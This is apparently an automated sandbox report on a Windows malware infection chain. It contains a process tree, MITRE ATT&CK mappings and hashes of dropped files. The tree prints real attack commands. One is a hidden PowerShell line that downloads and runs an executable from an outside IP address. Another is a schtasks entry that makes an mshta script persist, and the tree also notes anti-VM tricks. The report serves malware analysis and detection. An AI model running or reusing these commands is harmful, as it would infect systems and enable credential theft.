                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075847021\am_no.cmd" "
                                                                                                                                                    5⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5828
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075847021\am_no.cmd" any_word
                                                                                                                                                      6⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:5960
                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                        timeout /t 2
                                                                                                                                                        7⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:5920
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                        7⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:6060
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                          8⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:6096
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                        7⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3200
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                          8⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3008
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                        7⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4504
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                          8⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1428
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /create /tn "zjA05maFc1I" /tr "mshta \"C:\Temp\iLIK9o2xn.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                        7⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:3808
                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        mshta "C:\Temp\iLIK9o2xn.hta"
                                                                                                                                                        7⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4636
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                          8⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:4008
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                            9⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:1980
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1075848001\Fe36XBk.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1075848001\Fe36XBk.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                    • Writes to the Master Boot Record (MBR)
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1204
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1075850001\7fOMOTQ.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1075850001\7fOMOTQ.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1212
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1075851001\L5shRfh.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1075851001\L5shRfh.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4868
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1075851001\L5shRfh.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1075851001\L5shRfh.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:6128
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 1480
                                                                                                                                                        7⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:6288
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 960
                                                                                                                                                      6⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5332
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1075852001\k6Sly2p.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1075852001\k6Sly2p.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4980
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z0787.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z0787.exe
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:4036
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\GQ1M5XQLILADEZ6JS0N.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\GQ1M5XQLILADEZ6JS0N.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:1184
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1W2O0ISUNGK8RN369BCMXP9WR1R.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1W2O0ISUNGK8RN369BCMXP9WR1R.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:5080
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E61p.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E61p.exe
                                                                                                                                              2⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:3908
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            1⤵
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:2112
                                                                                                                                          • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
                                                                                                                                            1⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:3688
                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:3576
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4500 -ip 4500
                                                                                                                                              1⤵
                                                                                                                                                PID:1448
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                1⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:2196
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3764 -ip 3764
                                                                                                                                                1⤵
                                                                                                                                                  PID:1060
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4700
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4324 -ip 4324
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4332
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3272 -ip 3272
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1724
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1148
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5992
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5084 -ip 5084
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5216
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            PID:4028
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            PID:4920
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5384
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4868 -ip 4868
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2612
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6128 -ip 6128
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6772

                                                                                                                                                              Network

                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                              Reconnaissance

                                                                                                                                                              Resource Development

                                                                                                                                                              Initial Access

                                                                                                                                                              Execution

                                                                                                                                                              Command and Scripting Interpreter

                                                                                                                                                              1
                                                                                                                                                              T1059

                                                                                                                                                              PowerShell

                                                                                                                                                              1
                                                                                                                                                              T1059.001

                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Scheduled Task

                                                                                                                                                              1
                                                                                                                                                              T1053.005

                                                                                                                                                              Persistence

                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                              1
                                                                                                                                                              T1547

                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                              1
                                                                                                                                                              T1547.001

                                                                                                                                                              Create or Modify System Process

                                                                                                                                                              5
                                                                                                                                                              T1543

                                                                                                                                                              Windows Service

                                                                                                                                                              5
                                                                                                                                                              T1543.003

                                                                                                                                                              Event Triggered Execution

                                                                                                                                                              1
                                                                                                                                                              T1546

                                                                                                                                                              Netsh Helper DLL

                                                                                                                                                              1
                                                                                                                                                              T1546.007

                                                                                                                                                              Modify Authentication Process

                                                                                                                                                              1
                                                                                                                                                              T1556

                                                                                                                                                              Pre-OS Boot

                                                                                                                                                              1
                                                                                                                                                              T1542

                                                                                                                                                              Bootkit

                                                                                                                                                              1
                                                                                                                                                              T1542.003

                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Scheduled Task

                                                                                                                                                              1
                                                                                                                                                              T1053.005

                                                                                                                                                              Privilege Escalation

                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                              1
                                                                                                                                                              T1547

                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                              1
                                                                                                                                                              T1547.001

                                                                                                                                                              Create or Modify System Process

                                                                                                                                                              5
                                                                                                                                                              T1543

                                                                                                                                                              Windows Service

                                                                                                                                                              5
                                                                                                                                                              T1543.003

                                                                                                                                                              Event Triggered Execution

                                                                                                                                                              1
                                                                                                                                                              T1546

                                                                                                                                                              Netsh Helper DLL

                                                                                                                                                              1
                                                                                                                                                              T1546.007

                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Scheduled Task

                                                                                                                                                              1
                                                                                                                                                              T1053.005

                                                                                                                                                              Defense Evasion

                                                                                                                                                              Impair Defenses

                                                                                                                                                              6
                                                                                                                                                              T1562

                                                                                                                                                              Disable or Modify System Firewall

                                                                                                                                                              1
                                                                                                                                                              T1562.004

                                                                                                                                                              Disable or Modify Tools

                                                                                                                                                              5
                                                                                                                                                              T1562.001

                                                                                                                                                              Modify Authentication Process

                                                                                                                                                              1
                                                                                                                                                              T1556

                                                                                                                                                              Modify Registry

                                                                                                                                                              6
                                                                                                                                                              T1112

                                                                                                                                                              Pre-OS Boot

                                                                                                                                                              1
                                                                                                                                                              T1542

                                                                                                                                                              Bootkit

                                                                                                                                                              1
                                                                                                                                                              T1542.003

                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                              3
                                                                                                                                                              T1497

                                                                                                                                                              Credential Access

                                                                                                                                                              Credentials from Password Stores

                                                                                                                                                              1
                                                                                                                                                              T1555

                                                                                                                                                              Credentials from Web Browsers

                                                                                                                                                              1
                                                                                                                                                              T1555.003

                                                                                                                                                              Modify Authentication Process

                                                                                                                                                              1
                                                                                                                                                              T1556

                                                                                                                                                              Steal Web Session Cookie

                                                                                                                                                              1
                                                                                                                                                              T1539

                                                                                                                                                              Unsecured Credentials

                                                                                                                                                              4
                                                                                                                                                              T1552

                                                                                                                                                              Credentials In Files

                                                                                                                                                              4
                                                                                                                                                              T1552.001

                                                                                                                                                              Discovery

                                                                                                                                                              Browser Information Discovery

                                                                                                                                                              1
                                                                                                                                                              T1217

                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                              1
                                                                                                                                                              T1120

                                                                                                                                                              Process Discovery

                                                                                                                                                              1
                                                                                                                                                              T1057

                                                                                                                                                              Query Registry

                                                                                                                                                              10
                                                                                                                                                              T1012

                                                                                                                                                              System Information Discovery

                                                                                                                                                              7
                                                                                                                                                              T1082

                                                                                                                                                              System Location Discovery

                                                                                                                                                              1
                                                                                                                                                              T1614

                                                                                                                                                              System Language Discovery

                                                                                                                                                              1
                                                                                                                                                              T1614.001

                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                              3
                                                                                                                                                              T1497

                                                                                                                                                              Lateral Movement

                                                                                                                                                              Collection

                                                                                                                                                              Data from Local System

                                                                                                                                                              3
                                                                                                                                                              T1005

                                                                                                                                                              Command and Control

                                                                                                                                                              Web Service

                                                                                                                                                              1
                                                                                                                                                              T1102

                                                                                                                                                              Exfiltration

                                                                                                                                                              Impact

                                                                                                                                                              Replay Monitor

                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                              Downloads

                                                                                                                                                              • C:\ProgramData\jm7yu\89hl6x
                                                                                                                                                                Filesize

                                                                                                                                                                124KB

                                                                                                                                                                MD5

                                                                                                                                                                9618e15b04a4ddb39ed6c496575f6f95

                                                                                                                                                                SHA1

                                                                                                                                                                1c28f8750e5555776b3c80b187c5d15a443a7412

                                                                                                                                                                SHA256

                                                                                                                                                                a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

                                                                                                                                                                SHA512

                                                                                                                                                                f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin:.repos
                                                                                                                                                                Filesize

                                                                                                                                                                1.2MB

                                                                                                                                                                MD5

                                                                                                                                                                6cd146553c7965021eb01150953759d1

                                                                                                                                                                SHA1

                                                                                                                                                                a9d9e1069b7f6bef63b92cb07f074364dd31d104

                                                                                                                                                                SHA256

                                                                                                                                                                8c12370bd1337c3189948609d02bcd7d8c0cfee5536f6c3bfeaaaf7bd78c45f0

                                                                                                                                                                SHA512

                                                                                                                                                                e99e914795d45eafc196233203e386422c73013aca9311611560ed05595dd47ab6e1c2910c06c3156ed886f38dc2232487c5beb7bc28f61dd57abfbf5587bdb5

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_89854CA6A0F0936A4D2ECA78845CEA25
                                                                                                                                                                Filesize

                                                                                                                                                                1KB

                                                                                                                                                                MD5

                                                                                                                                                                b76c39e7734bee71acdcd60855dd056e

                                                                                                                                                                SHA1

                                                                                                                                                                1de6d62ae9197c60cd7f8de9ceec106448355f32

                                                                                                                                                                SHA256

                                                                                                                                                                8d1e09f70bbf34acfc75c2f8fe01b7e946d028f489cbf83c73f0697de15beb39

                                                                                                                                                                SHA512

                                                                                                                                                                6b35b259a7ca8fc4162025f37bb475a364c82b948ec89fb493babfca99992846bd55c0020e4efbf6cac2890393b9b71d04c70f19d32ce093e319e8cde10ed242

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_89854CA6A0F0936A4D2ECA78845CEA25
                                                                                                                                                                Filesize

                                                                                                                                                                482B

                                                                                                                                                                MD5

                                                                                                                                                                36eccbdb5abae6f4745417e9cb88ff75

                                                                                                                                                                SHA1

                                                                                                                                                                62c8fe671818c43509d580033880961b2788b10d

                                                                                                                                                                SHA256

                                                                                                                                                                f68d41708ac30179497853d92126765398315a23891d751b875a78407d73dcb6

                                                                                                                                                                SHA512

                                                                                                                                                                4ffb6a70083a772d1e4763f2b04ad8f37de219d804fe9fa4a707e9503aa24129713481abdff68faedffb580aae779f248f8978688eed361456aa70d917b5687a

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                Filesize

                                                                                                                                                                40B

                                                                                                                                                                MD5

                                                                                                                                                                8fe8337b1b65fcff059ba87479905541

                                                                                                                                                                SHA1

                                                                                                                                                                95582d714a60bbcad3af085e1302ed71f86a7293

                                                                                                                                                                SHA256

                                                                                                                                                                fa62de0888fac51cddb6b27abcc944ab85f2e98d30fb5caf31905c14377468cd

                                                                                                                                                                SHA512

                                                                                                                                                                8a8282930d67e6ed9688a0c986a6dda09238ef2b53bf6cd37fbbe2c704dcc1b137afad3b7f7146d93784cba8045c80680df1f27293eca80558fe6ed35fd51003

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                                                                                                                Filesize

                                                                                                                                                                2B

                                                                                                                                                                MD5

                                                                                                                                                                d751713988987e9331980363e24189ce

                                                                                                                                                                SHA1

                                                                                                                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                SHA256

                                                                                                                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                SHA512

                                                                                                                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
                                                                                                                                                                Filesize

                                                                                                                                                                16B

                                                                                                                                                                MD5

                                                                                                                                                                46295cac801e5d4857d09837238a6394

                                                                                                                                                                SHA1

                                                                                                                                                                44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                SHA256

                                                                                                                                                                0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                SHA512

                                                                                                                                                                8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\MANIFEST-000001
                                                                                                                                                                Filesize

                                                                                                                                                                41B

                                                                                                                                                                MD5

                                                                                                                                                                5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                SHA1

                                                                                                                                                                d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                SHA256

                                                                                                                                                                f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                SHA512

                                                                                                                                                                de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                                                                                                Filesize

                                                                                                                                                                126KB

                                                                                                                                                                MD5

                                                                                                                                                                19517c94497e967067c0cdad2fe9ef82

                                                                                                                                                                SHA1

                                                                                                                                                                0d65eb1bfdc01100aaed85258cf91f4b019fe43b

                                                                                                                                                                SHA256

                                                                                                                                                                b182acff48901e7359c410dfd98c78b5c86bc4ed61fde8f8bd263a29874c2f59

                                                                                                                                                                SHA512

                                                                                                                                                                d5bb868550221b28f08c9f524c4a943161b16cdafe5e7b6e87e77f4d68eae484703c4eca740594c1dab47cc0c85e2bc89521f1c2ae6658512ef7d19f6c492c3a

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
                                                                                                                                                                Filesize

                                                                                                                                                                284B

                                                                                                                                                                MD5

                                                                                                                                                                d9addd545db0d4cecf119a8eb65af6d4

                                                                                                                                                                SHA1

                                                                                                                                                                41ccb8281dd00e0c26f9c5cac87c472f2649b4af

                                                                                                                                                                SHA256

                                                                                                                                                                b3d3ba9ece97ad77b8923d6a831ec6e4743282e4e0b6ac1a6307096586fad67b

                                                                                                                                                                SHA512

                                                                                                                                                                3f075c66cf406af3ad4ea33b2e40d8adea21ad313a3974c3c389c2a5448d51c87179456f7f178c5ceaf0312626fd91a29fae17f6b378afe98b5e60ae0a6645bf

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\50ef42d2-43d5-4a85-a2ea-612eafa5a63e.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                10.4MB

                                                                                                                                                                MD5

                                                                                                                                                                1049bfa384c6d31f7d7db0e8a91fe908

                                                                                                                                                                SHA1

                                                                                                                                                                63548ee66bd6763a74430eebfdf765318376685f

                                                                                                                                                                SHA256

                                                                                                                                                                4b795b3c1cb90606f4fffb7b5c458840c43e5d538d93ece4eabab9ef92d1c610

                                                                                                                                                                SHA512

                                                                                                                                                                05bb77d527007adfe23e4654147ebb5358667b896b485e19e7e816a9c301547b3c1c93e69296efcd4430c18dca5e611e2c74c6fef112fa4e995e431523212b0a

                                                                                                                                                                Download Submit

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\aaac2647-f2a0-4b31-bde2-fec13d70f10b.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                10.5MB

                                                                                                                                                                MD5

                                                                                                                                                                47070be6bf5e166029042d132b21dd40

                                                                                                                                                                SHA1

                                                                                                                                                                8161d6ee28aae7cf057a50b5d71061a9b1de8f00

